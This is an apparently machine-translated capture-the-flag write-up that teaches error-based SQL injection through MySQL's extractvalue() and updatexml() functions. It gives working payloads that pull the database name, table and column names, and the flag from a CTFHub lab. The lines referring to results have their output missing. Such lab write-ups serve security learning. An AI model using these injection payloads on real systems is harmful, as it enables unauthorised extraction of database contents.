SQL error injection 1

When an error occurs in the input statement , The corresponding error will be output to the front end .SQL Error injection is based on this condition .

Commonly used error reporting function ：updatexml(),extractvalue(),floor(),exp()

among extractvalue() Usage is

extractvalue(xml_str,Xpath), It's from xml Query in Xpath Format string , And return the result

however ,Xpath Cannot be a combination ~ or # String , Otherwise, an error will be reported , An error message will echo the entire string of the error , Therefore, you can use the error echo to find the desired information （xml_str You can fill in at will ）, such as ,ctfhub This question CTFHub

Input ：

1 and extractvalue(1,concat(0x7e,database()))#

Get the current database by sqli

Then find the tables contained in the current database ：

1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='sqli')))#

Get the results

  You know sqli In the database , In addition to tables news, And the watch flag,

Look up the fields in the table ：

1 and extractvalue(2,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag')))#

obtain ：

  You can see the table flag There are only fields in flag

So type ：
 

1 and extractvalue(1,concat(0x7e,(select flag from flag)))#

Get the results ：

  It should be noted that ,xpath Echo upper limit 32 position

about updatexml() function , The format is updatexml(xml,Xpath,news), Is to find and replace xml In the document Xpath The format string is news Format , among Xpath Utilization and extractvalue similar , Therefore, the injection method is just an additional one that can be used at will news The input of , For example, for the above topic , Input ：

1 and updatexml(1,concat(0x7e,(select flag from flag)),1)#

I get the answer ：